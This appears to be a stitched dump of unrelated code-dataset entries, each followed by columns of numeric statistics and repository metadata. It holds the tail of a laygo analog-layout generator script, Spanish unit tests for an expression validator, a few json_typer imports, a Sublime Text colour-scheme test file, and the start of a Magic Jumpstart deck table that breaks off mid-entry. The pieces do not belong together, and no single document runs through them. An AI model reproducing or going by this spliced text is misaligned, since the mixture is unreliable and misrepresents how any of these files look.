    # vertical M3 straps over both taps; rg_m2m3 is a module-level grid name
    pwr_dim=laygen.get_template_size(name=itapl.cellname, gridname=rg_m2m3, libname=itapl.libname)
    rvdd = []
    rvss = []
    rp1='VDD'
    # NOTE(review): this loop starts at i=0 while the sibling generators start
    # at 1, so the first iteration exports pins labeled 'VDD-2'/'VSS-2'
    # (negative suffix) — confirm the off-by-one labeling is intentional.
    for i in range(0, int(pwr_dim[0]/2)):
        rvdd.append(laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2*i, 0]), xy1=np.array([2*i, 0]), gridname0=rg_m2m3,
                                 refinstname0=itapl.name, refpinname0='VSS', refinstindex0=np.array([0, 0]),
                                 refinstname1=itapl.name, refpinname1=rp1, refinstindex1=np.array([0, 0])))
        rvss.append(laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2*i+1, 0]), xy1=np.array([2*i+1, 0]), gridname0=rg_m2m3,
                                 refinstname0=itapl.name, refpinname0='VSS', refinstindex0=np.array([0, 0]),
                                 refinstname1=itapl.name, refpinname1=rp1, refinstindex1=np.array([0, 0])))
        laygen.pin_from_rect('VDD'+str(2*i-2), laygen.layers['pin'][3], rvdd[-1], gridname=rg_m2m3, netname='VDD')
        laygen.pin_from_rect('VSS'+str(2*i-2), laygen.layers['pin'][3], rvss[-1], gridname=rg_m2m3, netname='VSS')
        rvdd.append(laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2*i+2+1, 0]), xy1=np.array([2*i+2+1, 0]), gridname0=rg_m2m3,
                                 refinstname0=itapr.name, refpinname0='VSS', refinstindex0=np.array([0, 0]),
                                 refinstname1=itapr.name, refpinname1=rp1, refinstindex1=np.array([0, 0])))
        rvss.append(laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2*i+2, 0]), xy1=np.array([2*i+2, 0]), gridname0=rg_m2m3,
                                 refinstname0=itapr.name, refpinname0='VSS', refinstindex0=np.array([0, 0]),
                                 refinstname1=itapr.name, refpinname1=rp1, refinstindex1=np.array([0, 0])))
        laygen.pin_from_rect('VDD'+str(2*i-1), laygen.layers['pin'][3], rvdd[-1], gridname=rg_m2m3, netname='VDD')
        laygen.pin_from_rect('VSS'+str(2*i-1), laygen.layers['pin'][3], rvss[-1], gridname=rg_m2m3, netname='VSS')
    # second pass over the same columns, now with addvia0/addvia1 to drop vias
    # onto the tap VDD/VSS rails
    for j in range(0, int(pwr_dim[0]/2)):
        rvdd.append(laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2*j, 0]), xy1=np.array([2*j, 0]), gridname0=rg_m2m3,
                                 refinstname0=itapl.name, refpinname0='VDD', refinstindex0=np.array([0, 0]), addvia0=True,
                                 refinstname1=itapl.name, refpinname1='VSS', refinstindex1=np.array([0, 0])))
        rvss.append(laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2*j+1, 0]), xy1=np.array([2*j+1, 0]), gridname0=rg_m2m3,
                                 refinstname0=itapl.name, refpinname0='VDD', refinstindex0=np.array([0, 0]),
                                 refinstname1=itapl.name, refpinname1='VSS', refinstindex1=np.array([0, 0]), addvia1=True))
        rvdd.append(laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2*j+2+1, 0]), xy1=np.array([2*j+2+1, 0]), gridname0=rg_m2m3,
                                 refinstname0=itapr.name, refpinname0='VDD', refinstindex0=np.array([0, 0]), addvia0=True,
                                 refinstname1=itapr.name, refpinname1='VSS', refinstindex1=np.array([0, 0])))
        rvss.append(laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2*j+2, 0]), xy1=np.array([2*j+2, 0]), gridname0=rg_m2m3,
                                 refinstname0=itapr.name, refpinname0='VDD', refinstindex0=np.array([0, 0]),
                                 refinstname1=itapr.name, refpinname1='VSS', refinstindex1=np.array([0, 0]), addvia1=True))
if __name__ == '__main__':
    laygen = laygo.GridLayoutGenerator(config_file="laygo_config.yaml")
    # fall back to phantom (abstract) cells when BAG is not installed
    import imp
    try:
        imp.find_module('bag')
        laygen.use_phantom = False
    except ImportError:
        laygen.use_phantom = True

    tech = laygen.tech
    utemplib = tech+'_microtemplates_dense'
    logictemplib = tech+'_logic_templates'
    laygen.load_template(filename=tech+'_microtemplates_dense_templates.yaml', libname=utemplib)
    laygen.load_grid(filename=tech+'_microtemplates_dense_grids.yaml', libname=utemplib)
    laygen.load_template(filename=logictemplib+'.yaml', libname=logictemplib)
    laygen.templates.sel_library(utemplib)
    laygen.grids.sel_library(utemplib)

    # library load or generation
    workinglib = 'adc_sar_generated'
    laygen.add_library(workinglib)
    laygen.sel_library(workinglib)
    if os.path.exists(workinglib+'.yaml'):  # generated layout file exists
        laygen.load_template(filename=workinglib+'.yaml', libname=workinglib)
        laygen.templates.sel_library(utemplib)

    # grid names
    pg = 'placement_basic'  # placement grid
    rg_m1m2 = 'route_M1_M2_cmos'
    rg_m1m2_thick = 'route_M1_M2_thick'
    rg_m2m3 = 'route_M2_M3_cmos'
    rg_m3m4 = 'route_M3_M4_basic'
    rg_m4m5 = 'route_M4_M5_basic'
    rg_m5m6 = 'route_M5_M6_basic'
    rg_m1m2_pin = 'route_M1_M2_basic'
    rg_m2m3_pin = 'route_M2_M3_basic'

    mycell_list = []
    num_bits = 9
    # load system parameters from the preset file when requested
    load_from_file = True
    yamlfile_system_input = "adc_sar_dsn_system_input.yaml"
    if load_from_file:
        with open(yamlfile_system_input, 'r') as stream:
            # bugfix: yaml.load() without an explicit Loader is deprecated and
            # unsafe; SafeLoader is sufficient for this plain config file.
            sysdict_i = yaml.load(stream, Loader=yaml.SafeLoader)
        num_bits = sysdict_i['n_bit']

    def _spacing_params(cellname):
        """Return (m_space_4x, m_space_2x, m_space_1x): filler counts padding
        *cellname* out to the sarafe_nsw array width minus two tap widths."""
        x0 = laygen.templates.get_template('sarafe_nsw_'+str(num_bits-1)+'b', libname=workinglib).xy[1][0] \
             - laygen.templates.get_template(cellname, libname=workinglib).xy[1][0] \
             - laygen.templates.get_template('nmos4_fast_left').xy[1][0] * 2
        m_space = int(round(x0 / laygen.templates.get_template('space_1x', libname=logictemplib).xy[1][0]))
        m_space_4x = int(m_space/4)
        m_space_2x = int((m_space-m_space_4x*4)/2)
        m_space_1x = int(m_space-m_space_4x*4-m_space_2x*2)
        return m_space_4x, m_space_2x, m_space_1x

    def _generate_slice(cellname, genfunc):
        """Generate a single delay-slice cell (no spacing pass needed)."""
        print(cellname+" generating")
        mycell_list.append(cellname)
        laygen.add_cell(cellname)
        laygen.sel_cell(cellname)
        genfunc(laygen, objectname_pfix='DSL0', templib_logic=logictemplib, placement_grid=pg,
                routing_grid_m3m4=rg_m3m4, m=1, origin=np.array([0, 0]))
        laygen.add_template_from_cell()

    def _generate_array(cellname, genfunc):
        """Two-pass array generation: build once without fillers to register the
        cell width, then rebuild with filler counts matching the target width."""
        print(cellname+" generating")
        mycell_list.append(cellname)
        # pass 1: generate without spacing so the template database knows the width
        laygen.add_cell(cellname)
        laygen.sel_cell(cellname)
        genfunc(laygen, objectname_pfix='CKD0', templib_logic=logictemplib, workinglib=workinglib,
                placement_grid=pg, routing_grid_m3m4=rg_m3m4, m_space_4x=0, m_space_2x=0, m_space_1x=0,
                origin=np.array([0, 0]))
        laygen.add_template_from_cell()
        # pass 2: compute the spacing parameters and regenerate
        m_space_4x, m_space_2x, m_space_1x = _spacing_params(cellname)
        laygen.add_cell(cellname)
        laygen.sel_cell(cellname)
        genfunc(laygen, objectname_pfix='CKD0', templib_logic=logictemplib, workinglib=workinglib,
                placement_grid=pg, routing_grid_m3m4=rg_m3m4, m_space_4x=m_space_4x, m_space_2x=m_space_2x,
                m_space_1x=m_space_1x, origin=np.array([0, 0]))
        laygen.add_template_from_cell()

    # cell generation, in the original order: slice, array, compact slices,
    # compact array, dual compact array
    _generate_slice('sarclkdelayslice', generate_sarclkdelayslice)
    _generate_array('sarclkdelay', generate_sarclkdelay)
    _generate_slice('sarclkdelayslice_compact', generate_sarclkdelayslice_compact)
    _generate_slice('sarclkdelayslice_compact_2x', generate_sarclkdelayslice_compact_2x)
    _generate_array('sarclkdelay_compact', generate_sarclkdelay_compact)
    _generate_array('sarclkdelay_compact_dual', generate_sarclkdelay_compact_dual)

    laygen.save_template(filename=workinglib+'.yaml', libname=workinglib)

    # bag export, if bag does not exist, gds export
    try:
        imp.find_module('bag')
        import bag
        prj = bag.BagProject()
        for mycell in mycell_list:
            laygen.sel_cell(mycell)
            laygen.export_BAG(prj, array_delimiter=['[', ']'])
    except ImportError:
        laygen.export_GDS('output.gds', cellname=mycell_list, layermapfile=tech+".layermap")  # change layermapfile
| 65.257831
| 140
| 0.632413
| 7,346
| 54,164
| 4.495236
| 0.057174
| 0.069045
| 0.072073
| 0.022076
| 0.894676
| 0.876476
| 0.846133
| 0.831325
| 0.830174
| 0.827872
| 0
| 0.056811
| 0.203475
| 54,164
| 829
| 141
| 65.33655
| 0.708597
| 0.087161
| 0
| 0.730645
| 0
| 0
| 0.053449
| 0.005465
| 0
| 0
| 0
| 0
| 0
| 1
| 0.01129
| false
| 0
| 0.016129
| 0
| 0.027419
| 0.009677
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
eb8385f4b0b10b57bc9b52d2001a3a06024b7bd2
| 1,841
|
py
|
Python
|
Clase7/test_es_valida.py
|
JoseCordobaEAN/EstructurasDeDatosUE4P
|
86a5c426d83d9d9ae86656c3c78324a1c07f608d
|
[
"MIT"
] | 2
|
2019-08-17T21:15:47.000Z
|
2019-09-21T12:15:19.000Z
|
Clase7/test_es_valida.py
|
JoseCordobaEAN/EstructurasDeDatosUE4P
|
86a5c426d83d9d9ae86656c3c78324a1c07f608d
|
[
"MIT"
] | null | null | null |
Clase7/test_es_valida.py
|
JoseCordobaEAN/EstructurasDeDatosUE4P
|
86a5c426d83d9d9ae86656c3c78324a1c07f608d
|
[
"MIT"
] | null | null | null |
from unittest import TestCase
from Clase7.analizador_de_expresiones import es_valida
class TestEs_valida(TestCase):
    """Unit tests for es_valida, the expression-validity checker."""

    def test_es_valida_caso_regular(self):
        # Well-formed expressions are accepted.
        for expresion_de_prueba in ('( a * b )',
                                    '( ( ax % yb ) )',
                                    '[ ( aaz + zbb ) ]',
                                    '{ [ aafp / pwbb ] }',
                                    'a + b + c',
                                    'a '):
            self.assertTrue(es_valida(expresion_de_prueba))

    def test_es_valida_caso_dos_variables(self):
        # Two adjacent operands without an operator are rejected.
        for expresion_de_prueba in ('a b', 'xx yy'):
            self.assertFalse(es_valida(expresion_de_prueba))

    def test_es_valida_caso_dos_operadores(self):
        # Two adjacent operators are rejected.
        for expresion_de_prueba in ('* +', '% /'):
            print(f'probando {expresion_de_prueba}')
            self.assertFalse(es_valida(expresion_de_prueba))

    def test_es_valida_caso_parentesis_no_balanceados(self):
        # Mismatched bracket types are rejected.
        for expresion_de_prueba in ('( ( ( ) } )', '( ( ( ] ] )'):
            self.assertFalse(es_valida(expresion_de_prueba))

    def test_es_valida_caso_parentesis_sobrante(self):
        # A lone closing or opening bracket is rejected.
        for expresion_de_prueba in (')', '('):
            self.assertFalse(es_valida(expresion_de_prueba))
| 40.911111
| 60
| 0.691472
| 224
| 1,841
| 5.223214
| 0.1875
| 0.282051
| 0.435897
| 0.22735
| 0.852991
| 0.835897
| 0.835897
| 0.784615
| 0.784615
| 0.784615
| 0
| 0.000688
| 0.210212
| 1,841
| 45
| 61
| 40.911111
| 0.803989
| 0
| 0
| 0.421053
| 0
| 0
| 0.091748
| 0.022801
| 0
| 0
| 0
| 0
| 0.368421
| 1
| 0.131579
| false
| 0
| 0.052632
| 0
| 0.210526
| 0.052632
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
6911c67b1c7c73a4fe9f3e81c008a6d105ffc51a
| 161
|
py
|
Python
|
json_typer/__init__.py
|
maspe36/JSONTyper
|
26d0bbf73c093cf8781a6946425cbede13c7c2dc
|
[
"MIT"
] | 4
|
2018-12-01T19:57:59.000Z
|
2022-03-25T18:51:09.000Z
|
json_typer/__init__.py
|
maspe36/JSONTyper
|
26d0bbf73c093cf8781a6946425cbede13c7c2dc
|
[
"MIT"
] | 1
|
2018-07-21T22:52:57.000Z
|
2018-12-01T18:09:45.000Z
|
json_typer/__init__.py
|
maspe36/json-typer
|
26d0bbf73c093cf8781a6946425cbede13c7c2dc
|
[
"MIT"
] | null | null | null |
from json_typer import io
from json_typer.serializables.serializable import Serializable
from json_typer.serializables.type_serializable import TypeSerializable
| 40.25
| 71
| 0.900621
| 20
| 161
| 7.05
| 0.45
| 0.170213
| 0.276596
| 0.368794
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.074534
| 161
| 3
| 72
| 53.666667
| 0.946309
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
692b788f1c72e000cdb703ffcdce376aa1c3ec8a
| 9,096
|
py
|
Python
|
color_scheme_tests/dark_medium/color_scheme_test.py
|
Briles/gruvbox
|
d127fc8887ea006ead49e97eed4d89955fbb5e16
|
[
"MIT"
] | 251
|
2016-03-04T04:32:10.000Z
|
2022-03-22T09:52:02.000Z
|
color_scheme_tests/dark_medium/color_scheme_test.py
|
Briles/gruvbox
|
d127fc8887ea006ead49e97eed4d89955fbb5e16
|
[
"MIT"
] | 50
|
2016-03-09T07:41:55.000Z
|
2021-01-20T11:09:56.000Z
|
color_scheme_tests/dark_medium/color_scheme_test.py
|
Briles/gruvbox
|
d127fc8887ea006ead49e97eed4d89955fbb5e16
|
[
"MIT"
] | 23
|
2016-05-21T19:57:27.000Z
|
2022-02-01T15:44:00.000Z
|
# COLOR SCHEME TEST "gruvbox/gruvbox (Dark) (Medium).sublime-color-scheme" "Python" # flake8: noqa
# This indented comment is to the preceding whitespace.
# ^ fg=#928374 fs=italic
# ^^^^ fg=#928374 fs=italic
# ^^^^^^^^ fg=#928374 fs=italic
# ^^^^^^^ fg=#928374 fs=italic
# ^^ fg=#928374 fs=italic
# ^^ fg=#928374 fs=italic
# ^^^ fg=#928374 fs=italic
# ^^^^^^^^^ fg=#928374 fs=italic
# ^^^^^^^^^^^ fg=#928374 fs=italic
import os
# ^^^^ fg=#fb4934 fs=
# ^^ fg=#ebdbb2 fs=
import path from os
# ^^^^ fg=#fb4934 fs=
# ^^^^ fg=#ebdbb2 fs=
# ^^^^ fg=#ebdbb2 fs=
# ^^ fg=#ebdbb2 fs=
__all__
# ^^^^^ fg=#fabd2f fs=
__file__
# ^^^^^^ fg=#fabd2f fs=
__missing__
# ^^^^^^^^^ fg=#8ec07c fs=
__bool__
# ^^^^^^ fg=#8ec07c fs=
__debug__
# ^^^^^^^ fg=#d3869b fs=
abc = 'x'
# ^ fg=#ebdbb2 fs=
# ^ fg=#8ec07c fs=
# ^ fg=#ebdbb2 fs=
# ^ fg=#b8bb26 fs=
# ^ fg=#ebdbb2 fs=
BC = 'x'
# ^ fg=#8ec07c fs=
# ^ fg=#ebdbb2 fs=
# ^ fg=#b8bb26 fs=
# ^ fg=#ebdbb2 fs=
x = ABC
# ^ fg=#8ec07c fs=
# ^^^ fg=#fabd2f fs=
x = "_\x00_\xaa_\'_%s_"
# ^ fg=#8ec07c fs=
# ^ fg=#ebdbb2 fs=
# ^ fg=#b8bb26 fs=
# ^^^^ fg=#fb4934 fs=
# ^ fg=#b8bb26 fs=
# ^^^^ fg=#fb4934 fs=
# ^ fg=#b8bb26 fs=
# ^^ fg=#fb4934 fs=
# ^ fg=#b8bb26 fs=
# ^^ fg=#8ec07c fs=
# ^ fg=#b8bb26 fs=
# ^ fg=#ebdbb2 fs=
x = '_\m_\\m_'
# ^ fg=#8ec07c fs=
# ^ fg=#ebdbb2 fs=
# ^ fg=#b8bb26 fs=
# ^^ fg=#ebdbb2 bg=#fb4934 fs=
# ^ fg=#b8bb26 fs=
# ^^ fg=#fb4934 fs=
# ^^ fg=#b8bb26 fs=
# ^ fg=#ebdbb2 fs=
x = b'x'
# ^ fg=#8ec07c fs=
# ^ fg=#fb4934 fs=
# ^ fg=#ebdbb2 fs=
# ^ fg=#b8bb26 fs=
# ^ fg=#ebdbb2 fs=
'ab'.upper()
# ^ fg=#b8bb26 fs=
# ^^ fg=#ebdbb2 fs=
# ^^^^^ fg=#8ec07c fs=
# ^^ fg=#ebdbb2 fs=
x = '|'.join(sorted(x))
# ^ fg=#8ec07c fs=
# ^ fg=#ebdbb2 fs=
# ^ fg=#b8bb26 fs=
# ^^ fg=#ebdbb2 fs=
# ^^^^ fg=#8ec07c fs=
# ^ fg=#ebdbb2 fs=
# ^^^^^^ fg=#8ec07c fs=
# ^^^^ fg=#ebdbb2 fs=
x = f"{x}"
# ^ fg=#8ec07c fs=
# ^ fg=#fb4934 fs=
# ^ fg=#ebdbb2 fs=
# ^ fg=#8ec07c fs=
# ^ fg=#83a598 fs=
# ^ fg=#8ec07c fs=
# ^ fg=#ebdbb2 fs=
def x():
# ^ fg=#8ec07c fs=
# ^ fg=#b8bb26 fs=
# ^^^ fg=#ebdbb2 fs=
pass
# ^^^^ fg=#fb4934 fs=
def x():
"""x"""
# ^^^^^^^ fg=#928374 fs=italic
pass
def x():
"""
# ^^^ fg=#928374 fs=italic
x
# ^ fg=#928374 fs=italic
"""
# ^^^ fg=#928374 fs=italic
# pass
def x():
# ^ fg=#8ec07c fs=
# ^ fg=#b8bb26 fs=
# ^^^ fg=#ebdbb2 fs=
abc = 'x'
# ^^^ fg=#ebdbb2 fs=
# ^ fg=#8ec07c fs=
# ^ fg=#ebdbb2 fs=
# ^ fg=#b8bb26 fs=
# ^ fg=#ebdbb2 fs=
call(x, 'y', True, False)
# ^^^^ fg=#8ec07c fs=
# ^^^ fg=#ebdbb2 fs=
# ^ fg=#ebdbb2 fs=
# ^ fg=#b8bb26 fs=
# ^^ fg=#ebdbb2 fs=
# ^^^^ fg=#d3869b fs=
# ^ fg=#ebdbb2 fs=
# ^^^^^ fg=#d3869b fs=
# ^ fg=#ebdbb2 fs=
call(x=y)
# ^^^^ fg=#8ec07c fs=
# ^^ fg=#ebdbb2 fs=
# ^ fg=#8ec07c fs=
# ^^ fg=#ebdbb2 fs=
if isinstance(var, list):
# ^^ fg=#fb4934 fs=
# ^^^^^^^^^^ fg=#8ec07c fs=
# ^^^^^ fg=#ebdbb2 fs=
# ^^^^ fg=#fabd2f fs=
# ^^ fg=#ebdbb2 fs=
arr = []
# ^^^ fg=#ebdbb2 fs=
# ^ fg=#8ec07c fs=
# ^^ fg=#ebdbb2 fs=
arr.append('x')
# ^^^^ fg=#ebdbb2 fs=
# ^^^^^^ fg=#8ec07c fs=
# ^^ fg=#ebdbb2 fs=
# ^ fg=#b8bb26 fs=
# ^^ fg=#ebdbb2 fs=
arr.sort()
# ^^^^ fg=#ebdbb2 fs=
# ^^^^ fg=#8ec07c fs=
# ^^ fg=#ebdbb2 fs=
if len(x):
# ^^ fg=#fb4934 fs=
# ^^^ fg=#8ec07c fs=
# ^^^^ fg=#ebdbb2 fs=
print('Hi')
# ^^^^^ fg=#8ec07c fs=
# ^^ fg=#ebdbb2 fs=
# ^^ fg=#b8bb26 fs=
# ^^ fg=#ebdbb2 fs=
fmt = 'x={}'.format(s['y'])
# ^^^ fg=#ebdbb2 fs=
# ^ fg=#8ec07c fs=
# ^ fg=#ebdbb2 fs=
# ^^ fg=#b8bb26 fs=
# ^^^^ fg=#ebdbb2 fs=
# ^^^^^^ fg=#8ec07c fs=
# ^^^^ fg=#ebdbb2 fs=
# ^ fg=#b8bb26 fs=
# ^^^ fg=#ebdbb2 fs=
x = u'x%s' % y
# ^ fg=#ebdbb2 fs=
# ^ fg=#8ec07c fs=
# ^ fg=#fb4934 fs=
# ^ fg=#ebdbb2 fs=
# ^ fg=#b8bb26 fs=
# ^^ fg=#8ec07c fs=
# ^ fg=#ebdbb2 fs=
# ^ fg=#8ec07c fs=
# ^ fg=#ebdbb2 fs=
x = "x {y} z".format(y=z)
# ^ fg=#ebdbb2 fs=
# ^ fg=#8ec07c fs=
# ^ fg=#ebdbb2 fs=
# ^ fg=#b8bb26 fs=
# ^ fg=#ebdbb2 fs=
# ^ fg=#8ec07c fs=
# ^ fg=#ebdbb2 fs=
# ^ fg=#b8bb26 fs=
# ^^ fg=#ebdbb2 fs=
# ^^^^^^ fg=#8ec07c fs=
# ^^ fg=#ebdbb2 fs=
# ^ fg=#8ec07c fs=
# ^^ fg=#ebdbb2 fs=
x = re.match('^.+\\.x$')
# ^ fg=#ebdbb2 fs=
# ^ fg=#8ec07c fs=
# ^^^ fg=#ebdbb2 fs=
# ^^^^^ fg=#8ec07c fs=
# ^^ fg=#ebdbb2 fs=
# ^^^ fg=#b8bb26 fs=
# ^^ fg=#fb4934 fs=
# ^^^ fg=#b8bb26 fs=
# ^^ fg=#ebdbb2 fs=
@requires_x
# ^^^^^^^^^ fg=#83a598 fs=
def f_name(arg1='', arg2=0):
# ^ fg=#8ec07c fs=
# ^^^^^^ fg=#b8bb26 fs=
# ^^^^^ fg=#ebdbb2 fs=
# ^ fg=#8ec07c fs=
# ^^^ fg=#ebdbb2 fs=
# ^^^^ fg=#ebdbb2 fs=
# ^ fg=#8ec07c fs=
# ^ fg=#d3869b fs=
# ^^ fg=#ebdbb2 fs=
if a > b: # x
# ^^ fg=#fb4934 fs=
# ^ fg=#ebdbb2 fs=
# ^ fg=#8ec07c fs=
# ^^ fg=#ebdbb2 fs=
# ^ fg=#928374 fs=italic
# ^ fg=#928374 fs=italic
print 'a\'b'
# ^^^^^ fg=#fb4934 fs=
# ^ fg=#ebdbb2 fs=
# ^ fg=#b8bb26 fs=
# ^^ fg=#fb4934 fs=
# ^ fg=#b8bb26 fs=
# ^ fg=#ebdbb2 fs=
abc = d[0]
# ^^^ fg=#ebdbb2 fs=
# ^ fg=#8ec07c fs=
# ^^ fg=#ebdbb2 fs=
# ^ fg=#d3869b fs=
# ^ fg=#ebdbb2 fs=
abc.d(e)
# ^^^^ fg=#ebdbb2 fs=
# ^ fg=#8ec07c fs=
# ^^^ fg=#ebdbb2 fs=
return None
# ^^^^^^ fg=#fb4934 fs=
# ^^^^ fg=#d3869b fs=
class X():
# ^^^ fg=#fb4934 fs=
# ^ fg=#fabd2f fs=
# ^^^ fg=#ebdbb2 fs=
pass
# ^^^^ fg=#fb4934 fs=
class X(Y):
# ^^^ fg=#fb4934 fs=
# ^ fg=#fabd2f fs=
# ^ fg=#ebdbb2 fs=
# ^ fg=#fabd2f fs=
# ^^ fg=#ebdbb2 fs=
def __init__(self):
# ^^^ fg=#8ec07c fs=
# ^^^^^^^^ fg=#8ec07c fs=
# ^^^^^^^ fg=#ebdbb2 fs=
self.x = 123
# ^^^^ fg=#d3869b fs=
# ^^ fg=#ebdbb2 fs=
# ^ fg=#8ec07c fs=
# ^^^ fg=#d3869b fs=
self.x()
# ^^^^ fg=#d3869b fs=
# ^ fg=#ebdbb2 fs=
# ^ fg=#8ec07c fs=
# ^^ fg=#ebdbb2 fs=
self.x.y()
# ^^^^ fg=#d3869b fs=
# ^^^ fg=#ebdbb2 fs=
# ^ fg=#8ec07c fs=
# ^^ fg=#ebdbb2 fs=
abc(y)
# ^^^ fg=#8ec07c fs=
# ^^^ fg=#ebdbb2 fs=
def __str__(self)
# ^^^ fg=#8ec07c fs=
# ^^^^^^^ fg=#8ec07c fs=
# ^^^^^^ fg=#ebdbb2 fs=
return 'x'
# ^^^^^^ fg=#fb4934 fs=
# ^ fg=#ebdbb2 fs=
# ^ fg=#b8bb26 fs=
# ^ fg=#ebdbb2 fs=
def z(self, a, b):
# ^^^ fg=#8ec07c fs=
# ^ fg=#b8bb26 fs=
# ^^^^^^ fg=#ebdbb2 fs=
# ^^ fg=#ebdbb2 fs=
# ^^^ fg=#ebdbb2 fs=
if a == b:
# ^^ fg=#fb4934 fs=
# ^ fg=#ebdbb2 fs=
# ^^ fg=#8ec07c fs=
# ^^ fg=#ebdbb2 fs=
if fcall(a, b):
# ^^ fg=#fb4934 fs=
# ^^^^^ fg=#8ec07c fs=
# ^^^ fg=#ebdbb2 fs=
# ^^^ fg=#ebdbb2 fs=
return True
# ^^^^^^ fg=#fb4934 fs=
# ^^^^ fg=#d3869b fs=
return None
# ^^^^^^ fg=#fb4934 fs=
# ^^^^ fg=#d3869b fs=
@zyx
# ^ fg=#ebdbb2 fs=
# ^^^ fg=#83a598 fs=
def x(self):
pass
# ^^^^ fg=#fb4934 fs=
>>> msg = '''interpreter
# ^ fg=#8ec07c fs=
# ^^^ fg=#ebdbb2 fs=
# ^ fg=#8ec07c fs=
# ^^^ fg=#ebdbb2 fs=
# ^^^^^^^^^^^ fg=#b8bb26 fs=
... prompt'''
# ^ fg=#b8bb26 fs=
# ^^^^^^ fg=#b8bb26 fs=
# ^^^ fg=#ebdbb2 fs=
| 23.027848
| 98
| 0.362467
| 984
| 9,096
| 3.311992
| 0.095528
| 0.230746
| 0.319116
| 0.338754
| 0.843203
| 0.830316
| 0.822645
| 0.783369
| 0.742559
| 0.664007
| 0
| 0.125667
| 0.423483
| 9,096
| 394
| 99
| 23.086294
| 0.495805
| 0.76847
| 0
| 0.238806
| 0
| 0
| 0.148246
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.059701
| 0.029851
| null | null | 0.029851
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 12
|
15d6e0cb48886912b105e99e680b90805082271e
| 140,919
|
py
|
Python
|
new_magic/scripts/jumpstart.py
|
Wirox/mtg-octgn
|
6a56373a35350f5282fa369773cbceae490fa64a
|
[
"Unlicense"
] | 17
|
2015-01-04T18:15:34.000Z
|
2021-09-21T21:56:57.000Z
|
new_magic/scripts/jumpstart.py
|
Wirox/mtg-octgn
|
6a56373a35350f5282fa369773cbceae490fa64a
|
[
"Unlicense"
] | 38
|
2015-05-15T20:07:23.000Z
|
2021-08-28T14:53:50.000Z
|
new_magic/scripts/jumpstart.py
|
Wirox/mtg-octgn
|
6a56373a35350f5282fa369773cbceae490fa64a
|
[
"Unlicense"
] | 21
|
2015-01-12T21:51:22.000Z
|
2021-12-06T22:55:27.000Z
|
JumpstartDecks = {
"Above the Clouds-1": [
{
"id": "b238485f-ef67-4295-892b-a10235368f74",
"count": 1
},
{
"id": "cce6289e-f665-4faa-8285-c843447f3e52",
"count": 1
},
{
"id": "d961c441-b76b-4bd8-b510-a3e073207a1b",
"count": 1
},
{
"id": "8cbac0e4-f79f-476d-b410-d19ab3696606",
"count": 1
},
{
"id": "dee1d595-a998-4652-931f-a1a72446f3a6",
"count": 1
},
{
"id": "6ac0f66a-213f-463e-8ebb-35ff5940ea06",
"count": 1
},
{
"id": "8c58807d-1663-486a-ac94-627a8677f2b3",
"count": 1
},
{
"id": "64832674-beb1-446e-b2f7-8a5e271139a5",
"count": 1
},
{
"id": "da367981-9d6f-419f-9f58-f969b6183336",
"count": 1
},
{
"id": "b19de7a5-c291-405b-a2e6-8d3ac56e6570",
"count": 1
},
{
"id": "2dc0bafd-debc-4b62-9fe0-56b4aad02484",
"count": 1
},
{
"id": "f5ed9f08-56e8-4e24-aae2-05270d7c1ba8",
"count": 1
},
{
"id": "7eb8fd94-2b59-4b05-b4d0-c93497301d19",
"count": 1
},
{
"id": "6a3c7c06-76e4-487d-a63f-4aed3bbb4638",
"count": 7
}
],
"Above the Clouds-2": [
{
"id": "b238485f-ef67-4295-892b-a10235368f74",
"count": 1
},
{
"id": "cce6289e-f665-4faa-8285-c843447f3e52",
"count": 1
},
{
"id": "d961c441-b76b-4bd8-b510-a3e073207a1b",
"count": 1
},
{
"id": "8cbac0e4-f79f-476d-b410-d19ab3696606",
"count": 1
},
{
"id": "30032a0b-dece-42a4-9309-fa9e9e277603",
"count": 1
},
{
"id": "dee1d595-a998-4652-931f-a1a72446f3a6",
"count": 1
},
{
"id": "6ac0f66a-213f-463e-8ebb-35ff5940ea06",
"count": 1
},
{
"id": "393fc485-d3c1-4826-933d-89f66df769d4",
"count": 1
},
{
"id": "64832674-beb1-446e-b2f7-8a5e271139a5",
"count": 1
},
{
"id": "da367981-9d6f-419f-9f58-f969b6183336",
"count": 1
},
{
"id": "2dc0bafd-debc-4b62-9fe0-56b4aad02484",
"count": 1
},
{
"id": "4b153c2f-fc87-49bc-9d1e-d5e7e25b2142",
"count": 1
},
{
"id": "f5ed9f08-56e8-4e24-aae2-05270d7c1ba8",
"count": 1
},
{
"id": "7eb8fd94-2b59-4b05-b4d0-c93497301d19",
"count": 1
},
{
"id": "6a3c7c06-76e4-487d-a63f-4aed3bbb4638",
"count": 6
}
],
"Above the Clouds-3": [
{
